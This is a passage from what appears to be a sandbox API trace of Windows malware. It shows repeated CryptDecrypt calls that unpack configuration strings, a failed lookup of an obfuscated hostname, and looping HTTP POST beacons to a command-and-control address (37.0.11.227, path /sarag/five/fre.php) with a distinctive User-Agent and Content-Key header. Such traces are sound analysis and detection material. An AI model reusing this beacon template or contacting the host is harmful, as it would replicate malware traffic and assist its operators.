sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0278.277] GetProcessHeap () returned 0x690000 [0278.277] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab450 [0278.277] socket (af=2, type=1, protocol=6) returned 0x894 [0278.278] connect (s=0x894, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0278.306] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0278.306] GetProcessHeap () returned 0x690000 [0278.306] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0278.306] GetProcessHeap () returned 0x690000 [0278.306] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0278.307] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0278.307] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0278.307] GetProcessHeap () returned 0x690000 [0278.307] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af740 [0278.307] GetProcessHeap () returned 0x690000 [0278.308] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0278.308] GetProcessHeap () returned 0x690000 [0278.308] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0278.308] GetProcessHeap () returned 0x690000 [0278.308] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0278.309] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0278.310] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0278.310] GetProcessHeap () returned 0x690000 [0278.310] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0278.310] GetProcessHeap () returned 0x690000 [0278.310] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0278.310] send (s=0x894, buf=0x6ad508*, len=242, flags=0) returned 242 [0278.311] send (s=0x894, buf=0x6aba40*, len=159, flags=0) returned 159 [0278.311] GetProcessHeap () returned 0x690000 [0278.311] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0278.311] recv (in: s=0x894, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0278.389] GetProcessHeap () returned 0x690000 [0278.390] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0278.390] GetProcessHeap () returned 0x690000 [0278.390] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0278.391] GetProcessHeap () returned 0x690000 [0278.391] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af740 | out: hHeap=0x690000) returned 1 [0278.391] GetProcessHeap () returned 0x690000 [0278.392] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0278.392] closesocket (s=0x894) returned 0 [0278.392] GetProcessHeap () returned 0x690000 [0278.392] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab450 | out: hHeap=0x690000) returned 1 [0278.392] GetProcessHeap () returned 0x690000 [0278.393] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0278.395] GetProcessHeap () returned 0x690000 [0278.396] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0278.396] GetProcessHeap () returned 0x690000 [0278.396] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0278.397] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1654) returned 0x894 [0278.399] Sleep (dwMilliseconds=0xea60) [0278.400] GetProcessHeap () returned 0x690000 [0278.400] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0278.401] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.402] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0278.412] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.412] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0278.424] GetProcessHeap () returned 0x690000 [0278.424] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0278.424] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.425] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0278.426] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.426] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0278.432] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.433] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0278.433] GetProcessHeap () returned 0x690000 [0278.433] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0278.434] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.434] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0278.435] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.436] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0278.436] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.439] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0278.439] GetProcessHeap () returned 0x690000 [0278.439] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0278.440] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0278.441] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0278.441] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0278.442] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0278.442] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0278.443] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0278.444] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0278.444] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0278.444] GetProcessHeap () returned 0x690000 [0278.444] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0278.444] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0278.445] GetProcessHeap () returned 0x690000 [0278.445] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0278.445] GetProcessHeap () returned 0x690000 [0278.445] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0278.446] GetProcessHeap () returned 0x690000 [0278.446] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0278.446] GetProcessHeap () returned 0x690000 [0278.446] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0278.447] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.447] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0278.455] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.455] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0278.465] GetProcessHeap () returned 0x690000 [0278.465] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0278.465] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.466] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0278.467] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.467] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0278.468] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.468] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0278.468] GetProcessHeap () returned 0x690000 [0278.469] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0278.470] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.470] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0278.471] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.471] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0278.472] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.472] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0278.472] GetProcessHeap () returned 0x690000 [0278.472] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0278.473] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0278.473] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0278.474] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0278.474] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0278.475] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0278.475] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0278.476] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0278.477] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0278.477] GetProcessHeap () returned 0x690000 [0278.477] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0278.477] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0278.477] GetProcessHeap () returned 0x690000 [0278.477] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3b0 [0278.477] socket (af=2, type=1, protocol=6) returned 0x898 [0278.478] connect (s=0x898, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0278.517] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0278.517] GetProcessHeap () returned 0x690000 [0278.517] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0278.518] GetProcessHeap () returned 0x690000 [0278.518] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0278.518] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0278.519] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0278.519] GetProcessHeap () returned 0x690000 [0278.519] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af440 [0278.519] GetProcessHeap () returned 0x690000 [0278.520] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0278.520] GetProcessHeap () returned 0x690000 [0278.520] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0278.520] GetProcessHeap () returned 0x690000 [0278.520] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0278.521] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0278.522] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0278.522] GetProcessHeap () returned 0x690000 [0278.522] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0278.522] GetProcessHeap () returned 0x690000 [0278.522] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0278.522] send (s=0x898, buf=0x6ad508*, len=242, flags=0) returned 242 [0278.523] send (s=0x898, buf=0x6aba40*, len=159, flags=0) returned 159 [0278.523] GetProcessHeap () returned 0x690000 [0278.523] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0278.523] recv (in: s=0x898, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0278.595] GetProcessHeap () returned 0x690000 [0278.596] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0278.596] GetProcessHeap () returned 0x690000 [0278.596] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0278.596] GetProcessHeap () returned 0x690000 [0278.597] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af440 | out: hHeap=0x690000) returned 1 [0278.597] GetProcessHeap () returned 0x690000 [0278.597] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0278.597] closesocket (s=0x898) returned 0 [0278.598] GetProcessHeap () returned 0x690000 [0278.598] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3b0 | out: hHeap=0x690000) returned 1 [0278.598] GetProcessHeap () returned 0x690000 [0278.598] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0278.598] GetProcessHeap () returned 0x690000 [0278.599] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0278.599] GetProcessHeap () returned 0x690000 [0278.599] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0278.599] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1658) returned 0x898 [0278.601] Sleep (dwMilliseconds=0xea60) [0278.604] GetProcessHeap () returned 0x690000 [0278.604] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0278.605] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.606] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0278.611] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.611] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0278.620] GetProcessHeap () returned 0x690000 [0278.620] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0278.621] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.621] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0278.622] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.622] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0278.625] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.625] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0278.625] GetProcessHeap () returned 0x690000 [0278.626] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0278.627] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.628] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0278.629] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.630] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0278.631] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.632] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0278.632] GetProcessHeap () returned 0x690000 [0278.632] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0278.633] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0278.634] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0278.634] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0278.634] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0278.635] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0278.656] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0278.656] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0278.657] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0278.657] GetProcessHeap () returned 0x690000 [0278.657] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0278.657] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0278.657] GetProcessHeap () returned 0x690000 [0278.657] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0278.658] GetProcessHeap () returned 0x690000 [0278.658] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0278.658] GetProcessHeap () returned 0x690000 [0278.658] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0278.659] GetProcessHeap () returned 0x690000 [0278.659] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0278.659] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.660] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0278.666] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.667] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0278.674] GetProcessHeap () returned 0x690000 [0278.674] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0278.675] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.675] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0278.676] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.676] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0278.677] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.677] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0278.677] GetProcessHeap () returned 0x690000 [0278.678] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0278.678] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.679] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0278.679] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.680] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0278.680] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0278.681] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0278.681] GetProcessHeap () returned 0x690000 [0278.681] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0278.681] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0278.682] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0278.682] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0278.683] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0278.683] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0278.685] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0278.686] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0278.686] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0278.686] GetProcessHeap () returned 0x690000 [0278.686] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0278.686] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0278.686] GetProcessHeap () returned 0x690000 [0278.686] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab360 [0278.686] socket (af=2, type=1, protocol=6) returned 0x89c [0278.687] connect (s=0x89c, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0278.714] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0278.714] GetProcessHeap () returned 0x690000 [0278.714] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aee58 [0278.714] GetProcessHeap () returned 0x690000 [0278.714] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0278.715] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0278.716] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; 